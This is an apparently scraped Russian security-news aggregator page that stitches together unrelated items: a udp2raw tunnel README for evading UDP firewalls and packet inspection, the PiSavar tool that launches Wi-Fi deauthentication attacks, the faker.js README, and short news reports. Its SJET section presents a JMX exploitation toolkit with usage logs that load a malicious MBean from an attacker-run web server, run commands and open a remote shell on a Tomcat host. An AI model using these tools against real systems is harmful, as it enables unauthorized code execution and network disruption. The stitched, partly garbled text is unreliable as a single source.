Новости мира информационной безопасности. Расследование и реагирование на инциденты. Кибербезопасность.

A UDP Tunnel which tunnels UDP via FakeTCP/UDP/ICMP Traffic by using Raw Socket, helps you Bypass UDP FireWalls (or Unstable UDP Environment). Its Encrypted, Anti-Replay and Multiplexed.It also acts as a Connection Stabilizer.

Support Platforms

A Linux host (including desktop Linux, Android phone/tablet, OpenWRT router, or Raspberry PI) with root access.

For Winodws/MacOS, a virtual image with udp2raw pre-installed has been released, you can load it with Vmware/VirtualBox.The virtual image has been set to auto obtain ip, udp2raw can be run immediately after boot finished(make sure network mode of virtual machine has been set to bridged)(only udp2raw has to be run under a virtual machine, all other programs run under Windows/MacOS as usual).

Features

Send / Receive UDP Packet with fake-tcp/icmp headers

Fake-tcp/icmp headers help you bypass UDP blocking, UDP QOS or improper UDP NAT behavior on some ISPs. Raw packets with UDP headers are also supported.In UDP header mode, it behaves just like a normal UDP tunnel, and you can just make use of the other features.

Simulate TCP Handshake

Simulates the 3-way handshake, along with seq and ack_seq. TCP options MSS, sackOk, TS, TS_ack, wscale are also simulated. Real-time delivery guaranteed, no TCP over TCP problem when using OpenVPN.

Encryption, Anti-Replay, No MITM

Encrypt your traffic with AES-128-CBC.
Protect data integrity by MD5 or CRC32.
Defense replay attack with an anti-replay window, similar to IPSec and OpenVPN.
Authenticate mutually, no MITM attacks.

Failure Detection & Stabilization (Connection Recovery)

Connection failures are detected by heartbeats. If timed-out, the client will automatically change port number and reconnect. If reconnection is successful, the previous connection will be recovered, and all existing UDP conversations will stay valid.

For example, if you use UDP2RAW + OpenVPN, OpenVPN won't lose connection after any reconnect, even if the network cable is re-plugged or the WiFi access point is changed.

Other Features

Multiplexing One client can handle multiple UDP connections, all of which share the same raw connection.
Multiple Clients One server can have multiple clients.
NAT Support All of the 3 modes work in NAT environments.
OpenVZ Support Tested on BandwagonHost.
OpenWRT Support No dependencies, easy to build. Binary for ar71xx are included in release.

Keywords
UDP QoS Bypass UDP Blocking Bypass OpenVPN TCP over TCP problem OpenVPN over ICMP UDP to ICMP tunnel UDP to TCP tunnel UDP over ICMP UDP over TCP

Getting Started

Installing
Download binary release from https://github.com/wangyu-/udp2raw-tunnel/releases

Running
Assume your UDP is blocked or being QOS-ed or just poorly supported. Assume your server ip is 44.55.66.77, you have a service listening on udp port 7777.

# Run at server side:
./udp2raw_amd64 -s -l0.0.0.0:4096 -r 127.0.0.1:7777  -a -k "passwd" --raw-mode faketcp

# Run at client side
./udp2raw_amd64 -c -l0.0.0.0:3333  -r44.55.66.77:4096 -a -k "passwd" --raw-mode faketcp

Server Output:

Client Output:

Now, an encrypted raw tunnel has been established between client and server through TCP port 4096. Connecting to UDP port 3333 at the client side is equivalent to connecting to port 7777 at the server side. No UDP traffic will be exposed.

Note
to run on Android, see Android_Guide

Advanced Topic

Usage

udp2raw-tunnel
version: Aug 18 2017 00:29:11
repository: https://github.com/wangyu-/udp2raw-tunnel

usage:
    run as client : ./this_program -c -l local_listen_ip:local_port -r server_ip:server_port  [options]
    run as server : ./this_program -s -l server_listen_ip:server_port -r remote_ip:remote_port  [options]

common options, these options must be same on both side:
    --raw-mode            <string>        avaliable values:faketcp(default), udp, icmp
    -k, --key              <string>        password to gen symetric key, default:"secret key"
    --cipher-mode         <string>        avaliable values:aes128cbc(default), xor, none
    --auth-mode           <string>        avaliable values:md5(default), crc32, simple, none
    -a, --auto-rule                        auto add (and delete) iptables rule
    -g, --gen-rule                         generate iptables rule then exit
    --disable-anti-replay                 disable anti-replay, not suggested
client options:
    --source-ip           <ip>            force source-ip for raw socket
    --source-port         <port>          force source-port for raw socket, tcp/udp only
                                          this option disables port changing while re-connecting
other options:
    --log-level           <number>        0:never    1:fatal   2:error   3:warn 
                                          4:info (default)     5:debug   6:trace
    --log-position                        enable file name, function name, line number in log
    --disable-color                       disable log color
    --disable-bpf                         disable the kernel space filter, most time its not necessary
                                          unless you suspect there is a bug
    --sock-buf            <number>        buf size for socket, >=10 and <=10240, unit:kbyte, default:1024
    --seqmode             <number>        seq increase mode for faketcp:
                                          0:dont increase
                                          1:increase every packet
                                          2:increase randomly,  about every 3 packets (default)
    --lower-level         <string>        send packet at OSI level 2,  format:'if_name#dest_mac_adress'
                                          ie:'eth0#00:23:45:67:89:b9'.Beta.
    -h, --help                             print this help message

IPTABLES rule
This program sends packets via raw socket. In FakeTCP mode, Linux kernel TCP packet processing has to be blocked by a iptables rule on both sides, otherwise the kernel will automatically send RST for an unrecongized TCP packet and you will sustain from stability / peformance problems. You can use -a option to let the program automatically add / delete iptables rule on start / exit. You can also use the -g option to generate iptables rule and add it manually.

cipher-mode and auth-mode
It is suggested to use aes128cbc + md5 to obtain maximum security. If you want to run the program on a router, you can try xor + simple, which can fool packet inspection by firewalls the most of time, but it cannot protect you from serious attacks. Mode none is only for debugging purpose. It is not recommended to set the cipher-mode or auth-mode to none.

seq-mode
The FakeTCP mode does not behave 100% like a real tcp connection. ISPs may be able to distinguish the simulated tcp traffic from the real TCP traffic (though it's costly). seq-mode can help you change the seq increase behavior slightly. If you experience connection problems, try to change the value.

Peformance Test

Test method:
iperf3 TCP via OpenVPN + udp2raw (iperf3 UDP mode is not used because of a bug mentioned in this issue: https://github.com/esnet/iperf/issues/296 . Instead, we package the TCP traffic into UDP by OpenVPN to test the performance. Read Application for details.

iperf3 command:

iperf3 -c 10.222.2.1 -P40 
iperf3 -c 10.222.2.1 -P40 -R

Environments

Client Vultr $2.5/monthly plan (single core 2.4GHz cpu, 512MB RAM, Tokyo, Japan)
Server BandwagonHost $3.99/annually plan (single core 2.0GHz cpu, 128MB RAM, Los Angeles, USA)

Test1
raw_mode: faketcp cipher_mode: xor auth_mode: simple

(reverse speed was simliar and not uploaded)

Test2
raw_mode: faketcp cipher_mode: aes128cbc auth_mode: md5

(reverse speed was simliar and not uploaded)

Application

tunneling any traffic via raw traffic by using udp2raw +openvpn

bypasses UDP block/UDP QOS
no TCP ovr tcp problem (tcp over tcp problem http://sites.inka.de/bigred/devel/tcp-tcp.html , https://community.openvpn.net/openvpn/ticket/2 )
openvpn over icmp also becomes a choice

more details at openvpn+udp2raw_guide

speed-up tcp connection via raw traffic by using udp2raw+kcptun
kcptun is a tcp connection speed-up program, it speeds-up tcp connection by using kcp protocol on-top of udp.by using udp2raw, you can use kcptun while udp is QoSed or blocked. (kcptun, https://github.com/xtaci/kcptun)

speed-up tcp connection via raw traffic by using udp2raw+finalspeed
finalspeed is a tcp connection speed-up program similiar to kcptun, it speeds-up tcp connection by using kcp protocol on-top of udp or tcp.but its tcp mode doesnt support openvz, you can bypass this problem if you use udp2raw+finalspeed together, and icmp mode also becomes avaliable.

Other

Easier installation on ArchLinux

yaourt -S udp2raw-tunnel # or
pacaur -S udp2raw-tunnel

The goal of this project is to find out the fake access points opened by the WiFi pineapple device using the PineAP module and to prevent clients from being affected by initiating a deauthentication attack to the attacking device.

How PineAP Module Works

Collects SSID information
Creates SSID pool with collected SSID information
Creates fake access points using information in the SSID pool

Where is the problem?

One MAC address, more than one SSID information .... ..- -. - . .-.

Features of PiSavar

Detects PineAP activities
Detects networks opened by PineAP.
Starts deauthentication attack for PineAP.

Features to add

List of clients connected to fake access points
Record activities - Logging

Diagram

Usage

Requirements

Hardware: TP LINK TL-WN722N
Modules: scapy, time, termcolor, sys

Kali Linux:
Download pisavar:

git clone https://github.com/besimaltnok/PiSavar.git

Install Python librarie(s):

pip install termcolor

It's done!
Run the program with following command:
Monitor mode:

airmon-ng start interface(wlan0,wlan1) (Monitor mode)

or 

ifconfig wlan0 down
iwconfig wlan0 mode Monitor
ifconfig wlan0 up

Run:

cd PiSavar
python pisavar.py wlan0mon

Screenshots

Demo Video

"https://www.youtube.com/embed/P7mfh37NZc0"

Authors
This project is coded by Besim ALTINOK

Есть цель? Иди к ней!

Не получается? Ползи к ней!

Не можешь? Ляг и лежи в ее направлении!

Уже писал об оперативности обнаружения, однако, заметна потребность в более системном объяснении, попробую здесь.

Любую атаку хочется предвидеть и предотвратить. Если не получилось предотвратить, то минимизировать ущерб. Минимизировать ущерб можно пытаясь обнаружить успешную атаку как можно раньше и прервать "работу" ребят, пока атакующий не достиг своих целей полностью. Если брать во внимание целевые атаки, планируемые с учетом используемых у Цели средств безопасности, а, следовательно, успешно их обходящие, и выполняемые людьми, и поэтому крайне проблематичны для обезвреживания исключительно автоматическими средствами, то такие атаки гарантировано будут пропущены. И здесь мы как раз попадаем на тот случай, когда предотвратить не получилось и надо обнаружить, расследовать и почиститься. Для достижения этих целей и служит TH, который включается уже после взлома. Поскольку любая атака - это трата ресурсов, а тратить ресурсы впустую - глупо, и атакующие это понимают, постепенно сбывается то, что писал: "в перспективе нас ожидают исключительно таргетированные атаки". Как следствие - повышенное внимание к TH, как подходу, эффективно работающему после взлома.
Ну а что же работает до взлома? Как прежде - все те же автоматические превентивные меры: IPS-ы, WAF-ы, антивирусы и пр. И, если у них не получилось, включается ТН. Печальная очевидная правда в том, что для того, чтобы отличить плохое поведение от хорошего, нужно чтобы это поведение случилось, т.е. придется ~~дозволить~~ допустить сделать плохо, поскольку это (выполненное плохое действие) - единственный индикатор. Но, с дугой стороны, не надо рефлексировать относительно этого вынужденного дозволения, поскольку пока плохое не сделано, ущерба нет и, можно сказать, нет и инцидента.

Закончить этот короткий пост хочется очередной ассоциативной картинкой о до и после взлома, показывающей, что успех - не в чем-то одном, но в совокупности эффективно взаимно дополняющих подходов, хорошо работающих на разных этапах (в общем, как и с детектом).

Generate massive amounts of fake data in Node.js and the browser.

Demo
https://cdn.rawgit.com/Marak/faker.js/master/examples/browser/index.html

Hosted API Microservice
http://faker.hook.io

Supports all Faker API Methods
Full-Featured Microservice
Hosted by hook.io

curl http://faker.hook.io?property=name.findName&locale=de

Usage

Browser

<script src = "faker.js" type = "text/javascript"></script>
<script>
  var randomName = faker.name.findName(); // Caitlyn Kerluke
  var randomEmail = faker.internet.email(); // Rusty@arne.info
  var randomCard = faker.helpers.createCard(); // random contact card containing many properties
</script>

Node.js

var faker = require('faker');

var randomName = faker.name.findName(); // Rowan Nikolaus
var randomEmail = faker.internet.email(); // Kassandra.Haley@erich.biz
var randomCard = faker.helpers.createCard(); // random contact card containing many properties

API

Faker.fake()
faker.js contains a super useful generator method Faker.fake for combining faker API methods using a mustache string format.
Example:

console.log(faker.fake("{{name.lastName}}, {{name.firstName}} {{name.suffix}}"));
// outputs: "Marks, Dean Sr."

This will interpolate the format string with the value of methods name.lastName(), name.firstName(), and name.suffix()

JSDoc API Browser
http://marak.github.io/faker.js/

API Methods

address
- zipCode
- city
- cityPrefix
- citySuffix
- streetName
- streetAddress
- streetSuffix
- streetPrefix
- secondaryAddress
- county
- country
- countryCode
- state
- stateAbbr
- latitude
- longitude
commerce
- color
- department
- productName
- price
- productAdjective
- productMaterial
- product
company
- suffixes
- companyName
- companySuffix
- catchPhrase
- bs
- catchPhraseAdjective
- catchPhraseDescriptor
- catchPhraseNoun
- bsAdjective
- bsBuzz
- bsNoun
database
- column
- type
- collation
- engine
date
- past
- future
- between
- recent
- month
- weekday
fake
finance
- account
- accountName
- mask
- amount
- transactionType
- currencyCode
- currencyName
- currencySymbol
- bitcoinAddress
- iban
- bic
hacker
- abbreviation
- adjective
- noun
- verb
- ingverb
- phrase
helpers
- randomize
- slugify
- replaceSymbolWithNumber
- replaceSymbols
- shuffle
- mustache
- createCard
- contextualCard
- userCard
- createTransaction
image
- image
- avatar
- imageUrl
- abstract
- animals
- business
- cats
- city
- food
- nightlife
- fashion
- people
- nature
- sports
- technics
- transport
- dataUri
internet
- avatar
- email
- exampleEmail
- userName
- protocol
- url
- domainName
- domainSuffix
- domainWord
- ip
- ipv6
- userAgent
- color
- mac
- password
lorem
- word
- words
- sentence
- slug
- sentences
- paragraph
- paragraphs
- text
- lines
name
- firstName
- lastName
- findName
- jobTitle
- prefix
- suffix
- title
- jobDescriptor
- jobArea
- jobType
phone
- phoneNumber
- phoneNumberFormat
- phoneFormats
random
- number
- arrayElement
- objectElement
- uuid
- boolean
- word
- words
- image
- locale
- alphaNumeric
system
- fileName
- commonFileName
- mimeType
- commonFileType
- commonFileExt
- fileType
- fileExt
- directoryPath
- filePath
- semver

Localization
As of version v2.0.0 faker.js has support for multiple localities.
The default language locale is set to English.
Setting a new locale is simple:

// sets locale to de
faker.locale = "de";

az
cz
de
de_AT
de_CH
en
en_AU
en_BORK
en_CA
en_GB
en_IE
en_IND
en_US
en_au_ocker
es
es_MX
fa
fr
fr_CA
ge
id_ID
it
ja
ko
nb_NO
nep
nl
pl
pt_BR
ru
sk
sv
tr
uk
vi
zh_CN
zh_TW

Individual Localization Packages
As of vesion v3.0.0 faker.js supports incremental loading of locales.
By default, requiring faker will include all locale data.
In a production environment, you may only want to include the locale data for a specific set of locales.

// loads only de locale
var faker = require('faker/locale/de');

Setting a randomness seed
If you want consistent results, you can set your own seed:

faker.seed(123);

var firstRandom = faker.random.number();

// Setting the seed again resets the sequence.
faker.seed(123);

var secondRandom = faker.random.number();

console.log(firstRandom === secondRandom);

Tests

npm install .
make test

You can view a code coverage report generated in coverage/lcov-report/index.html.

Projects Built with faker.js

Fake JSON Schema
Use faker generators to populate JSON Schema samples. See: https://github.com/pateketrueke/json-schema-faker/

CLI
Run faker generators from Command Line. See: https://github.com/lestoni/faker-cli
Want to see your project added here? Let us know!

Meteor

Meteor Installation

meteor add practicalmeteor:faker

Meteor Usage, both client and server

var randomName = faker.name.findName(); // Rowan Nikolaus
var randomEmail = faker.internet.email(); // Kassandra.Haley@erich.biz
var randomCard = faker.helpers.createCard(); // random contact card containing many properties

Building faker.js
faker uses gulp to automate it's build process. Running the following build command will generate new browser builds, documentation, and code examples for the project.

npm run-script build

Building JSDocs

npm run-script doc

Ученые Университета имени Давида Бен-Гуриона в Негеве (Израиль) описали метод атаки на смартфоны и другие «умные» устройства с использованием вредоносного аппаратного обеспечения. Метод, получивший название «чип посередине», предполагает добавление в атакуемые устройства дополнительных компонентов. По словам исследователей, подобные атаки могут осуществляться заинтересованными третьими сторонами, занимающимися производством запчастей для «умных» гаджетов со встроенными вредоносными чипами.

Исследователи продемонстрировали атаку, изготовив вредоносные запчасти, с помощью которых им удалось получить контроль над тестируемым смартфоном. В ходе атаки ученые использовали уже готовую электронику стоимостью около $10, однако, несмотря на доступность материалов, для ее успешного осуществления требуются определенные знания и навыки. Тем не менее, атака не так сложна, как может показаться на первый взгляд, и не требует профессионального производственного оборудования, используемого на высокотехнологичных предприятиях.

С помощью вредоносных запчастей можно осуществить два типа атак. Первая предполагает внедрение команд в коммуникации между телефоном и запчастью. Лучше всего она работает с сенсорными дисплеями смартфонов, поскольку в таком случае злоумышленник может выдавать себя за пользователя, подделывая нажатия на экран.

Второй тип атак предполагает переполнение буфера путем эксплуатации уязвимости во встроенном в ядро ОС драйвере сенсорного экрана. Атакующий может проэксплуатировать данную уязвимость и повысить свои привилегии, а затем осуществить атаку на самой ОС без необходимости подделывать нажатия пользователя на экран.

"https://www.youtube.com/embed/WS4NChPjaaY"

"https://www.youtube.com/embed/fY58zoadqMA"

"https://www.youtube.com/embed/sDfD5fJfiNc"

Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean). In the API, classes can be dynamically loaded and instantiated. Managing and monitoring applications can be designed and developed using the Java Dynamic Management Kit.

SJET is a JMX exploitation toolkit.

Prerequisites

Usage
SJET implements a CLI interface (using argparse):

jython sjet.py targetHost targetPort MODE (modeOptions)

Where

targetHost - the target IP address
targerPort - the target port where JMX is running
MODE - the script mode
modeOptions - the options for the mode selected

Modes and modeOptions

install - installs the payload in the current target.
- payload_url - full URL to load the payload
- payload_port - port to load the payload
command - runs the command CMD in the targetHost
- CMD - the command to run
javascript - runs a javascript file FILENAME in the targetHost
shell - starts a simple shell in targetHost (with the limitations of java's Runtime.exec())

Explain how to run the automated tests for this system

Example

Installing the payload in a Windows target:

Patricios-MacBook-Pro:sjet preller$ Jython sjet.py 192.168.56.101 8008 install http://192.168.56.1 8888
[+] sjet was brought to you by siberas :)
[+] Starting webserver at port 8888
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.56.101:8008/jmxrmi
[+] Connected: rmi://192.168.56.1  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.56.1:8888
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.56.101 - - [11/Aug/2017 11:16:10] "GET / HTTP/1.1" 200 -
192.168.56.101 - - [11/Aug/2017 11:16:10] "GET /siberas_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded Siberas:name=payload,id=1
Patricios-MacBook-Pro:sjet preller$

Running the command 'dir' in a Windows target:

Patricios-MacBook-Pro:sjet preller$ Jython sjet.py 192.168.56.101 8008 command "dir"
[+] sjet was brought to you by siberas :)
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.56.101:8008/jmxrmi
[+] Connected: rmi://192.168.56.1  2
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: dir
 Volume in drive C has no label.
 Volume Serial Number is E0CE-337D

 Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0

08/11/2017  01:34 AM    <DIR>          .
08/11/2017  01:34 AM    <DIR>          ..
08/11/2017  01:34 AM                 3 ASDASD.txt
08/10/2017  07:08 AM    <DIR>          bin
08/10/2017  07:08 AM    <DIR>          conf
08/10/2017  07:08 AM    <DIR>          lib
08/02/2017  01:29 PM            58,153 LICENSE
08/11/2017  01:24 AM    <DIR>          logs
08/02/2017  01:29 PM             1,859 NOTICE
08/02/2017  01:29 PM             6,881 RELEASE-NOTES
08/11/2017  02:16 AM    <DIR>          temp
08/02/2017  01:29 PM            21,630 tomcat.ico
08/02/2017  01:29 PM            73,690 Uninstall.exe
08/10/2017  07:08 AM    <DIR>          webapps
08/10/2017  07:08 AM    <DIR>          work
08/11/2017  02:30 AM                17 _____SURELY_A_SAFE_FILE_____.exe
08/11/2017  02:29 AM                17 _____AND_DONT_CALL_ME_SHIRLEY_____.exe
               8 File(s)        162,253 bytes
               9 Dir(s)  124,198,735,872 bytes free

[+] Done
Patricios-MacBook-Pro:sjet preller$

Running the file poc.js in a Windows target:

Patricios-MacBook-Pro:sjet preller$ Jython sjet.py 192.168.56.101 8008 javascript "poc.js"
[+] sjet was brought to you by siberas :)
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.56.101:8008/jmxrmi
[+] Connected: rmi://192.168.56.1  4
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing script
None

Patricios-MacBook-Pro:sjet preller$

Running ping in shell mode in a Windows target:

Patricios-MacBook-Pro:sjet preller$ Jython sjet.py 192.168.56.101 8008 shell
[+] sjet was brought to you by siberas :)
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.56.101:8008/jmxrmi
[+] Connected: rmi://192.168.56.1  9
[+] Use command 'exit_shell' to exit the shell
>>> ping 127.0.0.1
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ping 127.0.0.1

Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms


>>>
>>>
[4]+  Stopped                 Jython sjet.py 192.168.56.101 8008 shell
Patricios-MacBook-Pro:sjet preller$

Authors

Hans-Martin Münch - Initial idea and work - h0ng10
Patricio Reller - CLI and extra options - preller

Исследователи безопасности из подразделения Zero day Initiative (ZDI), принадлежащего компании Trend Micro раскрыли подробности 2 не исправленных уязвимостей в популярном PDF-ридере Foxit Reader. Обе уязвимости (CVE-2017-10951 и CVE-2017-10952) позволяют выполнение произвольного кода на системе при определенных обстоятельствах.

В бюллетенях говорится, что производитель отказался устранять обнаруженные уязвимости и, по истечению 60 дней послу уведомления, исследователи публично раскрыли информацию об обнаруженных брешах.

Не смотря на то, что обе уязвимости позволяют удаленное выполнение кода, для успешной эксплуатации требуется, чтобы опция Safe Reading Mode была отключена (не является опцией по умолчанию).

Редакция SecurityLab рекомендует своим читателям всегда с осторожностью открывать файлы, присланные из недоверенных источников и всегда использовать настройки максимальной безопасности в приложениях, работающих с данными из сети интернет.

Вчера социальная сеть Facebook объявила победителя конкурса «2017 Internet Defense Prize». Команда исследователей из Калифорнийского университета в Беркли и Национальной лаборатории Лоуренса Беркли заработала награду в размере $100 тысяч за изобретение новой техники обнаружения целенаправленных фишинговых атак (spear-phishing) в корпоративной среде.

Новый метод, представленный в рамках USENIX Security Symposium, совмещает новую технику оценки аномалий для построения рейтинга уведомлений безопасности и функционал анализа целенаправленных фишинговых email-сообщений.

Для тестирования своего метода исследователи проанализировали более 370 млн email сообщений, полученных сотрудниками крупных компаний в период с марта 2013 до января 2017.

Первая часть обнаружения целенаправленного фишинга полагается на анализ двух основных составляющих: репутации домена и репутации отправителя. Репутация домена осуществляется путем проверки репутации ссылки в письме. Ссылка считается опасной, если она не посещалась многими сотрудниками компании, или если активность по ссылке началась совсем недавно.

Функционал проверки репутации отправителя пытается выяснить, не являются ли поля письма поддельными, например, имя отправителя и заголовок From.

После проведения анализа система должна принять решение на основе собранных данных и, в случае необходимости, создать уведомление об опасности. Система, предложенная учеными, называется непосредственной оценкой аномалий - “Directed Anomaly Scoring (DAS)”. Состоит она в определении подозрительности каждого события по отношению к другим событиям. После анализа всех событий, DAS выбирает события, получившие самую высокую оценку и сообщает о них службе безопасности.

По заявлению экспертов, новая технология способна обнаружить 17 из 19 фишинговых писем, а число ложных срабатываний составляет всего 0.005%.

Исследователь безопасности разместил на Reddit сообщение о продаже данных об уязвимости в системе двухфакторной аутентификации Poloniex. По словам исследователя, на такой поступок ему пришлось пойти, поскольку многие исследователи, сообщавшие об уязвимостях в техподдержку Poloniex получали угрозы вместо вознаграждения за обнаруженную брешь. А еще, исследователь так и не получил ответ на свои тикеты относительно уязвимости в течение 60 дней.

Согласно описанию, уязвимость позволяет осуществить денежные транзакции без использования одноразовых паролей. Исследователю удалось снять деньги с чужого счета в обход двухфакторной аутентификации, а учетные данные для входа было получены из общедоступных баз данных.

О проблеме службы технической поддержки в Reddit начали писать многие пользователи, жалующиеся на тикеты без ответа в течение 75 дней.

Что касается реакции представителей Poloniex, они опровергли наличие какой-либо уязвимости в системе двухфакторной аутентификации биржи. Не зависимо от того, есть уязвимость или нет, если вы являетесь пользователем биржи Poloniex, настоятельно рекомендуем вам сменить учетные данные, поскольку для успешной эксплуатации все же требуется знать логин и пароль жертвы.

Новости информационной безопасности

Udp2raw-tunnel - A UDP Tunnel which tunnels UDP via FakeTCP/UDP/ICMP Traffic by using Raw Socket [Bypass UDP FireWalls]

PiSavar - Detects PineAP Module and Starts Deauthentication Attack (for fake access points)

После взлома

faker.js - Generate Massive Amounts of Fake Data

Ученые представили атаку на смартфоны с помощью вредоносных запчастей

SJET - JMX Exploitation Toolkit

Personal Security Guide – iOS/Android

В Foxit Reader обнаружены 2 опасные уязвимости

Facebook выплатит $100 тыс. исследователям за разработку техники обнаружения целенаправленного фишинга

Исследователь заявил о продаже эксплоита для обхода двухфакторной аутентификации Poloniex